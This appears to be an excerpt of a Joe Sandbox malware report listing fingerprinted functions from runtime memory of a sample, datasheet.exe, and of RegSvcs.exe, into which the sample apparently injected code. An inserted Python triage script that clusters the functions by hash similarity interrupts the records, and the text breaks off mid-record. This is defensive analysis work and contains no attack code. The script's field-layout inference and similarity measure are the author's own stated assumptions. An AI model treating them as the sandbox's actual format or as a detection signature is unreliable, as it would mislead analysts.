                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: c2d8ef33e198104e39135c8106467af56424def08ae3d41cffddc095b5b31431
                                                            • Instruction ID: 7758c8c3568fceb8762472251657daef40d558810a1991f9543280ebde4932c5
                                                            • Opcode Fuzzy Hash: c2d8ef33e198104e39135c8106467af56424def08ae3d41cffddc095b5b31431
                                                            • Instruction Fuzzy Hash: 7F716970E002499FEB14DFA9C9807AEBBF2BF88714F14812DE555AB254EB749846CF81

                                                            Control-flow Graph (interactive widget; basic-block edge list not reproduced): function 6acea08-6aceb95, calling 6acd280 (from block 6acea25) and 6ace180 (from block 6acea4d) before reaching block 6acead7-6aceb64, which calls GlobalMemoryStatusEx and then falls into the shared tail 6aceb6d-6aceb95.
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2226513884.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_6ac0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18aaddc44331fbcf208a40bb12a505b0fd11b4dae08411d7a5addabbabd5862e
                                                            • Instruction ID: 889b69fe8ff2e30d9e5759e4e78791c54a725467ba83093620e1bbf3bddea42d
                                                            • Opcode Fuzzy Hash: 18aaddc44331fbcf208a40bb12a505b0fd11b4dae08411d7a5addabbabd5862e
                                                            • Instruction Fuzzy Hash: F2413272E0038A9FCB04EB69D8006DEBBF5BF89220F04866AD504A7251DB749845CBA1

                                                            Control-flow Graph (interactive widget; basic-block edge list not reproduced): function 6aceaf0-6aceb95, the inner part of the function above: block 6aceb36-6aceb64 calls GlobalMemoryStatusEx (ref 06ACEB57) and both outcomes converge on the tail 6aceb6d-6aceb95.
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 06ACEB57
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2226513884.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_6ac0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 42d45681b33a923375e5beb969848c0c02fb86abf445ee118484eafb8840bce3
                                                            • Instruction ID: ee6be8ee2f984dba5facb4b70687d21c433ef1603fc128470935bba27a8e41cd
                                                            • Opcode Fuzzy Hash: 42d45681b33a923375e5beb969848c0c02fb86abf445ee118484eafb8840bce3
                                                            • Instruction Fuzzy Hash: 241112B1C0065A9BCB10DF9AC844B9EFBF4BF48620F10812AD918B7240D378A950CFA5
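The records above are the unit an analyst actually works with: each dump name pairs a process and a region base with a function fingerprint, and "based on PE: false" marks memory that was populated at runtime rather than mapped from an image, which is where the unpacked payload in datasheet.exe (process 0) and the code it injected into RegSvcs.exe (process 9) live. The following Python script is an added example, not part of the Joe Sandbox report or of the sandbox's own tooling: it parses a handful of the records listed on this page, groups them by process and region, and clusters the near-identical functions by their Instruction Fuzzy Hash. Two things are assumptions: the field layout of the .sdmp name (process index first, region base fourth, inferred from how it lines up with the hcaresult_<process>_<phase>_<base>_<image>.jbxd snapshot name and cross-checked in code), and the positional nibble-match similarity, which is a simple heuristic of my own and not Joe Sandbox's similarity measure.

```python
"""Triage of Joe Sandbox 'Memory Dump Source' records (added example, not sandbox tooling)."""
import re
from collections import defaultdict
from itertools import combinations

# Constructed sample copied from records on this page:
# (source file, based on PE, snapshot file, instruction fuzzy hash).
# Process 0 is datasheet.exe, process 9 the RegSvcs.exe instance it injected into.
P0_7240000 = "00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp"
RECORDS = [
    (P0_7240000, False, "hcaresult_0_2_7240000_datasheet.jbxd",
     "13E11BB4E102598FDB14DFA9C580AAEFBF2FF49305F248269D415AB355D730A942CF60"),
    (P0_7240000, False, "hcaresult_0_2_7240000_datasheet.jbxd",
     "39E12EB4E112598FDB14DFA9C580AAEFBF2FF89305F248169D405AB355D730A982CF60"),
    (P0_7240000, False, "hcaresult_0_2_7240000_datasheet.jbxd",
     "C7E13EB4E111598FDB14DFA8C580AAEFBF2FF49304F248169D405AB355D770A982CF60"),
    (P0_7240000, False, "hcaresult_0_2_7240000_datasheet.jbxd",
     "58E12BB4E102598FDB14DFA8C580AAEFBB2FF89305F24C169D405AB355DB71A942CF60"),
    (P0_7240000, False, "hcaresult_0_2_7240000_datasheet.jbxd",
     "E3E13CB4E102598FDB14DF99C580AAEFBF2FF89305F248169D445AB355D730A982CF60"),
    ("00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp",
     False, "hcaresult_0_2_7c00000_datasheet.jbxd",
     "93D1D4B4A00545CFDB08DF69C598AA9B7F1BF8D711F2580A9E505AB3B1DB31AD40CFA0"),
    (P0_7240000, False, "hcaresult_0_2_7240000_datasheet.jbxd",
     "33D12631D2075ACADB00EBA4D8A4699B7B1FF95300F51C79AE00937225EFB06AC4CF91"),
    ("00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp",
     False, "hcaresult_0_2_2b30000_datasheet.jbxd",
     "EAA15F36E0061ACFCF16DFB4C4845AEB7B2FF84304B1545AAE805AB265DB71E956CF80"),
    (P0_7240000, False, "hcaresult_0_2_7240000_datasheet.jbxd",
     "7CD11531D2075ACADB00EBA4D8A4699B7B1FF95300F51D79AE00937225EFB06AC5CF91"),
    ("00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp",
     False, "hcaresult_9_2_15f0000_RegSvcs.jbxd",
     "8553E531C10B5A8ADB51EF68C8805A9F7B1FF99300F15D79AE4587B121FB70AAC5CB81"),
    ("00000009.00000002.2226513884.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp",
     False, "hcaresult_9_2_6ac0000_RegSvcs.jbxd",
     "241112B1C0065A9BCB10DF9AC844B9EFBF4BF48620F10812AD918B7240D378A950CFA5"),
]

SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_(.+)\.jbxd$")


def parse_record(source_file, snapshot_file):
    """Return process index, region base and image name for one record.

    Assumption: in the .sdmp name the first dotted field is the process index and
    the fourth the region base (inferred from the snapshot name); the two names
    are cross-checked so a wrong guess fails loudly instead of silently.
    """
    fields = source_file.split(".")
    m = SNAPSHOT_RE.match(snapshot_file)
    if len(fields) < 4 or m is None:
        raise ValueError("unrecognised Joe Sandbox dump/snapshot name")
    process_index, base = int(fields[0], 16), int(fields[3], 16)
    if process_index != int(m.group(1)) or base != int(m.group(3), 16):
        raise ValueError("dump name and snapshot name disagree")
    return {"process_index": process_index, "base": base, "image": m.group(4)}


def summarise_regions(records):
    """Per (process index, region base): image, PE backing and function count.
    Regions with pe_backed=False were filled at runtime: unpacked or injected code."""
    regions = {}
    for source_file, pe_backed, snapshot_file, _fuzzy in records:
        meta = parse_record(source_file, snapshot_file)
        key = (meta["process_index"], meta["base"])
        entry = regions.setdefault(key, {"image": meta["image"], "pe_backed": pe_backed, "functions": 0})
        entry["functions"] += 1
    return regions


def fuzzy_similarity(a, b):
    """Fraction of hex positions that agree (heuristic of this example, not Joe Sandbox's)."""
    if len(a) != len(b) or not a:
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


def cluster_hashes(hashes, threshold=0.75):
    """Single-linkage grouping: any pair at or above the threshold joins one cluster."""
    parent = list(range(len(hashes)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(hashes)), 2):
        if fuzzy_similarity(hashes[i], hashes[j]) >= threshold:
            parent[find(j)] = find(i)
    groups = defaultdict(list)
    for i, h in enumerate(hashes):
        groups[find(i)].append(h)
    return list(groups.values())


def report(records, threshold=0.75):
    """One line per region plus one line per group of near-identical functions."""
    lines = []
    for (pid, base), r in sorted(summarise_regions(records).items()):
        backing = "PE-backed" if r["pe_backed"] else "runtime-allocated, not PE-backed"
        lines.append(f"process {pid} ({r['image']}) region {base:#010x}: {r['functions']} function(s), {backing}")
    for group in cluster_hashes([rec[3] for rec in records], threshold):
        if len(group) > 1:
            lines.append(f"{len(group)} near-identical functions, e.g. {group[0][:16]}...")
    return lines


if __name__ == "__main__":
    print("\n".join(report(RECORDS)))
```

Run on the embedded records it reports three runtime-allocated regions in datasheet.exe and two in RegSvcs.exe, one group of five near-identical functions and one of two, both in the 07240000 region; every other function is a singleton. Lowering the threshold widens the groups, so treat the clustering as a triage aid for picking which variant to reverse by hand, not as a detection signature.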

                                                            Control-flow Graph (interactive widget; basic-block edge list not reproduced): function 15f3e66-15f4170, an earlier entry into the same body as 15f3e70 above, with the same three call sites into 15f0ab8 (at 15f4117, 15f412b and 15f413f) and the same self-looping tail at 15f4170.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 217bc31ad660b4614a72ea1ebf0aecb2bb586ada6ee9f688a28c2c2d2700b653
                                                            • Instruction ID: 325385f5a0550534f406df937bf9ed343882102c3b67c71c81246cb653fbb057
                                                            • Opcode Fuzzy Hash: 217bc31ad660b4614a72ea1ebf0aecb2bb586ada6ee9f688a28c2c2d2700b653
                                                            • Instruction Fuzzy Hash: 78A16C70E00209DFEF10DFA8C981B9EBBF2BF88714F14812DE515AB294EB749845CB91

                                                            Control-flow Graph (rendered graph not reproduced; node addresses range 15f86f8-15f8f1b)
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f178f2abf8ff8361ef18bc01f526fe98df525455a4209ceaebbbd96b12c082a
                                                            • Instruction ID: e45289daeabf2e8c971e3ebe26ed85134816dafaaf8aa95cb7eba101faadb2db
                                                            • Opcode Fuzzy Hash: 6f178f2abf8ff8361ef18bc01f526fe98df525455a4209ceaebbbd96b12c082a
                                                            • Instruction Fuzzy Hash: 38226030B002028BDB1AAB3CE55466D37A2FBC9314B24696DD106DF356CFB9DC878B95

                                                            Control-flow Graph (rendered graph not reproduced; node addresses range 15f8738-15f8f1b)
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 381447e6712b286273f395eac9b04578060340889c47289e94c270aac5eade77
                                                            • Instruction ID: bf9f3c2e61245185f19352a94d1928efb314a7b004478d595b32edb5837695ad
                                                            • Opcode Fuzzy Hash: 381447e6712b286273f395eac9b04578060340889c47289e94c270aac5eade77
                                                            • Instruction Fuzzy Hash: 01126D70B002038BDB1AAB3CE55466D37A6FBC9314B20696DD106DB355CFB9EC878B91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf22836dbf2b7c14af46fc848145972a2e2ac6e1170826caaad064d37f398894
                                                            • Instruction ID: dc7cd3f37cdc2162199953dedaeb58f96766328eb9eb4bc67e936ad7a6d84ecb
                                                            • Opcode Fuzzy Hash: cf22836dbf2b7c14af46fc848145972a2e2ac6e1170826caaad064d37f398894
                                                            • Instruction Fuzzy Hash: 4BE16074B012058FDF15DB68D588A6DBBB2FF88310F208929E60ADB355DB35ED42CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17b9532040a7a5b05e2c3d7225728c2ee28602f4df316f221aa751d97ddd0eb6
                                                            • Instruction ID: 08eb8b2898810a099467d9065a535e57f63101408a19b921c78d6fc709fb4889
                                                            • Opcode Fuzzy Hash: 17b9532040a7a5b05e2c3d7225728c2ee28602f4df316f221aa751d97ddd0eb6
                                                            • Instruction Fuzzy Hash: 69B14970E006198FDF10CFA9C8957AEBBF2BF88714F14852DD915EB294EB749845CB81
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebc5532e62b80b1b0aa9f703a42acdc66e0fd304a26cdf047a9370964ee8db70
                                                            • Instruction ID: de7132dc16c0567327e5fc222cc861c1dc03f85a43dc1db62a64c3cad1dccd64
                                                            • Opcode Fuzzy Hash: ebc5532e62b80b1b0aa9f703a42acdc66e0fd304a26cdf047a9370964ee8db70
                                                            • Instruction Fuzzy Hash: B1315C31E1125A9FDB15CF78C8547AEB7B2FF8A300F60855AEA01EB291D7709D42CB50
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1bc33756bffdf8d0774fc0d0d8744aef40d8260b58e8074714ffc4ebd0d60d37
                                                            • Instruction ID: 14c1be7f3bacbd4ec9a7b0c9fa759f0f4f963b2f51a1e883f5ddfe1a09430d9e
                                                            • Opcode Fuzzy Hash: 1bc33756bffdf8d0774fc0d0d8744aef40d8260b58e8074714ffc4ebd0d60d37
                                                            • Instruction Fuzzy Hash: 84514834B002158FDB14DB79C558AAE7BB6BF8D700F2044ADE606EF3A1DA759C41CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b851a6e9cfe901e8b46837f473d7474c58471b00be6dd1265f594602339b83dc
                                                            • Instruction ID: 3b7bea58efc1dec58f380037b01a06395b5f682bb312425e55dc762c6f3f61b4
                                                            • Opcode Fuzzy Hash: b851a6e9cfe901e8b46837f473d7474c58471b00be6dd1265f594602339b83dc
                                                            • Instruction Fuzzy Hash: 21516D717002169FDB15CF68C880B6EB7B6FF84310F258669E515DB29ACB71EC82C791
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64587a305f8ee1c8093ac9f9c63793c22c3dd1c7997e161dde542dc2ccc2cd26
                                                            • Instruction ID: 0a956c3d0a6bbc12b7e6b5aac2b153d4fbc3fb7814b571f96b52039208689074
                                                            • Opcode Fuzzy Hash: 64587a305f8ee1c8093ac9f9c63793c22c3dd1c7997e161dde542dc2ccc2cd26
                                                            • Instruction Fuzzy Hash: A2511975A012059FDB04DF69E884B9DFBB2FF88310F14C26AEA089F256E7709945CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd9e290ef528d0987bc72d63da2320a887287a8d6b6ecd554f9e43559b93d5f2
                                                            • Instruction ID: 258c4a4314ee50e97d365aa00bd8d055128319e5f0b0a24a652fb0610e14d174
                                                            • Opcode Fuzzy Hash: cd9e290ef528d0987bc72d63da2320a887287a8d6b6ecd554f9e43559b93d5f2
                                                            • Instruction Fuzzy Hash: 2C5113B1D002188FDB18CFA9C884B9EBBB1BF48314F14852EE915BB391D774A844CF95
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e5f60e5b83eab90dd3c63438bc37b94fd51af95d381ea5985ec0037efe97ba7
                                                            • Instruction ID: 2faf46cc15b5de7cd7f22d362125b35c3a551827af6a2d5eed234b3a8a33bc45
                                                            • Opcode Fuzzy Hash: 4e5f60e5b83eab90dd3c63438bc37b94fd51af95d381ea5985ec0037efe97ba7
                                                            • Instruction Fuzzy Hash: B25102B1E002188FDB18DFA9D884B9EBBB1BF48314F14852EE915BB391D774A844CF95
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: beb60a6a24495e6fb8cc995ee73d529c64cc839c81d3899bdef9130d25d3979d
                                                            • Instruction ID: 1eb719d9bb006d71949390d5ed5f9be0d9eb3164a2fb2ef3896f1072e29b968c
                                                            • Opcode Fuzzy Hash: beb60a6a24495e6fb8cc995ee73d529c64cc839c81d3899bdef9130d25d3979d
                                                            • Instruction Fuzzy Hash: C4519E30205286CFD719DF2AFA809683FB5FB9930175492ADD1105B266DAB86D87CF82
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6cd9d714d95ea40065032769b9f0bc396e24297761c8aa30cf5d43ddcb28f172
                                                            • Instruction ID: c83e8635fd71dd3ea639dfe039e5636e314ad1fb59e66239e377591d4393b82c
                                                            • Opcode Fuzzy Hash: 6cd9d714d95ea40065032769b9f0bc396e24297761c8aa30cf5d43ddcb28f172
                                                            • Instruction Fuzzy Hash: B3517D30201247CFD719DF2AFA809583FB5FBD9301754A2ADD1145B266DAB82D87CF82
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10701c3f0dc16f0dc601020b6cad77e233131271e541d67fe3b446d4f0c1e1d2
                                                            • Instruction ID: f1c497d500b11a88330919bf541cd579cef5d74e90154d8f484c0c7fc1963b54
                                                            • Opcode Fuzzy Hash: 10701c3f0dc16f0dc601020b6cad77e233131271e541d67fe3b446d4f0c1e1d2
                                                            • Instruction Fuzzy Hash: 88316D31E0021A9FEB19DF78D4447AEB7B2FF89314F50892AE602EB251D7709D86CB50
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f5d4bd74f0d8ecb26bdca504e9d25addbd257789808155219a512392b919e59
                                                            • Instruction ID: 62279b3841cf58d2ba0d201c0809f1682508db4732178f2a8e0608fbedc129c1
                                                            • Opcode Fuzzy Hash: 9f5d4bd74f0d8ecb26bdca504e9d25addbd257789808155219a512392b919e59
                                                            • Instruction Fuzzy Hash: 98410EB090030DDFDB10DFA9C880ADEBBF5FF48310F148029E909AB254DB74A946CB90
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: af9bb981fedd9e1dcd1129bda26af6b4f0293730046e7a7a0c570fb1b7ba5dd3
                                                            • Instruction ID: 47f136390a3c8fa415bf38e615e72f43027d74362aba7530971c70d54deb07c2
                                                            • Opcode Fuzzy Hash: af9bb981fedd9e1dcd1129bda26af6b4f0293730046e7a7a0c570fb1b7ba5dd3
                                                            • Instruction Fuzzy Hash: 79313830B00255CFDB25EB79C594AAE77F6BF89204F5005ACD641AF390EB3AAC41CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba728d476c185bd9a0140be201db45e1164451d66f74f8d2579c109963609b61
                                                            • Instruction ID: 43622b4d3c04f5e53d315ffddae6515ddad7b94aff0766ef261b1bb98125ceb6
                                                            • Opcode Fuzzy Hash: ba728d476c185bd9a0140be201db45e1164451d66f74f8d2579c109963609b61
                                                            • Instruction Fuzzy Hash: 5A41EDB0901349DFDB10DFA9C984A9EBBF5BF48310F208429E909AB254DB75A945CB90
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: da29282f209e8c829da4503be43b115f1741ea214e87e469d2e9ac3d984d2a30
                                                            • Instruction ID: d71fa5171a24eb9368364193d493a573d82d6f9c83fac59457f977dfd6b120fe
                                                            • Opcode Fuzzy Hash: da29282f209e8c829da4503be43b115f1741ea214e87e469d2e9ac3d984d2a30
                                                            • Instruction Fuzzy Hash: 60313A34B10215CFDB25EB79C554AAE77F6BF89204F1004ACD641AF390EB3A9D41CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7d1b7a05ba3b667e72fe37a02209fbef17e8ba66b07f025ed58bc28c63f0fa4
                                                            • Instruction ID: 3a28e22686495074340c6a30705434e14c5416d340cf47810ddc3cd393b93748
                                                            • Opcode Fuzzy Hash: e7d1b7a05ba3b667e72fe37a02209fbef17e8ba66b07f025ed58bc28c63f0fa4
                                                            • Instruction Fuzzy Hash: 98319530E1020A9BDB15CF69D850A9EFBB6FF89300F15C619E909EF345DB709942CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43c16c462cbf800b35440d0204631c65c9cdf528e1a686d37619dc1226b771b8
                                                            • Instruction ID: 0ee1f0d98732fc44320ce3746b5b53c2744b17475576399835a46607929fdd13
                                                            • Opcode Fuzzy Hash: 43c16c462cbf800b35440d0204631c65c9cdf528e1a686d37619dc1226b771b8
                                                            • Instruction Fuzzy Hash: D721C435A101058FEB14DB79C954BAE7BF6FF88714F118129E205EB3A0DA718D418BA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4456f69d12d5da462ad558d6235dd2bd31e4a0e77fdac49d4810b3cebac9ac37
                                                            • Instruction ID: a9dcd59c7f0ed6d265ce20013283bb81a13bf5db4998b6f0cba51c7a0a027066
                                                            • Opcode Fuzzy Hash: 4456f69d12d5da462ad558d6235dd2bd31e4a0e77fdac49d4810b3cebac9ac37
                                                            • Instruction Fuzzy Hash: D1217170E1020A9BDB15CF69D850A9EF7B6FF89300F10C619E909EB341DB709982CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 417af490ab3f66de4d15c9879920945a79c3f48223101624882ba8e265cf31f1
                                                            • Instruction ID: dae35d9fcfa8c11ec5829d26204145bc9bf645da20500e3bdfe6ad4c40d88070
                                                            • Opcode Fuzzy Hash: 417af490ab3f66de4d15c9879920945a79c3f48223101624882ba8e265cf31f1
                                                            • Instruction Fuzzy Hash: 28219F70600614CFEB36AB6CD4D836D3B61FB46315F04082DEA06DF785DA69DC89C752
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 179e651205cb0b4ff65773a12b5c35b1f68d3c8b37fa3cd484993cc78ddcbdf7
                                                            • Instruction ID: e0df20411841346bcce2aa459f7d990a97993c5929d062a6f6e69ce31ae477fd
                                                            • Opcode Fuzzy Hash: 179e651205cb0b4ff65773a12b5c35b1f68d3c8b37fa3cd484993cc78ddcbdf7
                                                            • Instruction Fuzzy Hash: 3621B030601506CFEB26DB28E8C475D3B72FB85314F14196DE60ACF256DA38DC85CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b8a61812854b9e689987827bea94f76850d5f99049d5922715561eb73abf99a
                                                            • Instruction ID: c5e61f87ed650821315e7a7590e760fe35d770c43f6b6a50ad6ee8faa81ae4c6
                                                            • Opcode Fuzzy Hash: 6b8a61812854b9e689987827bea94f76850d5f99049d5922715561eb73abf99a
                                                            • Instruction Fuzzy Hash: AF21F234700205CFDB18DF69C598AAE77F5BB89305B1044A8E60AEB3A4EB359D018B91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 382370e59da61021f737b2bca0c22bd7b34b4afb68deb828e55392acc2b76247
                                                            • Instruction ID: b198e67e4354ba713abb997cd9807f3659b2875151e3a97040d7310fe8bbff23
